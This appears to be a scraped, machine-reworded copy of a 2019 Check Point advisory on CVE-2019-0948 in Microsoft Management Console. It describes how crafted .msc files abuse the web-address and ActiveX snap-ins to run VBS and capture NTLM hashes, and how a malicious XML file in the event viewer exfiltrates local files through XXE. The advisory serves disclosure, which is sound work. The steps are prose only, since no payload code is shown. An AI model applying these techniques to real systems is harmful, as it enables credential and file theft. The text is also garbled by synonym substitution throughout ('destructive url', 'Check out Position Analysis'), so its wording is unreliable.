June 11, 2019
Investigate by: Eran Vaknin and Alon Boxiner
The objective of Microsoft Management Console (MMC) is to present a programming platform for generating and hosting purposes that control Microsoft Windows-based mostly ecosystem, and to present a basic, reliable and built-in management user interface and administration model.
A short while ago, Check out Position Analysis discovered numerous vulnerabilities in the console that would make it possible for an attacker to produce a malicious payload.
Microsoft has granted CVE-2019-0948 to this vulnerability and patched it in their June 11th Patch Tuesday release.”
1) Numerous XSS vulnerabilities thanks to misconfigured WebView.
MMC has an built-in Snap-In ingredient which in transform consists of numerous mechanisms this kind of as ActiveX Command, Url to World-wide-web Tackle, etcetera.
- As an attacker chooses the Website link to Website Tackle snap-in, he can insert a url to his server which is made up of an html webpage with a destructive payload.
As the victim opens the malicious .msc file, a website-check out is opened (in the MMC window) and the malicious payload is executed.
We have productively managed to insert destructive URL connection that has destructive payloads this kind of as redirection to SMB server that will capture the consumer NTLM hash.
What’s more, it is also possible to execute VBS script on the victims’ host by using the pointed out internet-see.
- An attacker chooses the ActiveX Control snap-in (all ActiveX controls are vulnerable) and will save it to file (.msc file). In the .msc file, less than the StringsTables area, the attacker alterations the third string price to destructive url under his regulate, containing an html site with a malicious payload. As mentions in sections a (over) – we have efficiently managed to insert destructive URL url that contains destructive payloads this kind of as redirection to SMB server that will capture the person NTLM hash.
Also, it is also attainable to execute VBS script on the victims’ host by means of the mentioned website-watch.
As the victim opens the malicious .msc file, a net-see is opened (in just the MMC window) and the destructive payload is executed.
2) Self XXE Vulnerability owing to misconfigured XML parser.
A target opens the MMC and chooses the function viewer snap-in and clicks on Motion and then on Import Custom made Look at. As soon as a destructive XML file is selected (that contains an XXE payload) any file from the victims host is despatched to the attacker.
This is probable owing to a misconfigured XML parser described inside the MMC custom view functionality.
Proof of Notion
1) Url to Web Address snap-in Cross-Web site Scripting (XSS):
The attacker adds a new snap-in:
The attacker chooses a Link to World wide web Tackle snap in:
The attacker then forms the route to his server made up of the destructive payload:
The attacker will save the .msc file and sends it to the sufferer:
The malicious .msc file includes the route to the attacker’s server:
As the target opens the malicious .msc file VBS code is executed:
2) ActiveX Regulate snap-ins: (Adobe Acrobat DC Browser instance):
The attacker provides a new snap-in:
The attacker chooses an ActiveX Management snap-in:
The ActiveX Management mechanism is then picked out (Adobe Acrobat DC Browser as an example):
The attacker saves the .msc file and sends it to the victim:
The destructive .msc file that contains the path to the attacker’s server:
As the victim opens the destructive .msc file VBS code is executed:
3) Self XXE Vulnerability Thanks to Misconfigured XML Parser:
Include a snap-in:
The attacker chooses the celebration viewer snap-in:
The sufferer selects ‘Action’ and then clicks on the ‘Import Tailor made View’ choice:
The victim selects the malicious XML despatched by the attacker
The malicious XML containing the XXE payload will browse the c:windowswin.ini file content and send out it to the distant server by means of HTTP/GET ask for:
Which in transform will simply call to xml.dtd:
The sought after file information is sent from the customer console application to a distant server: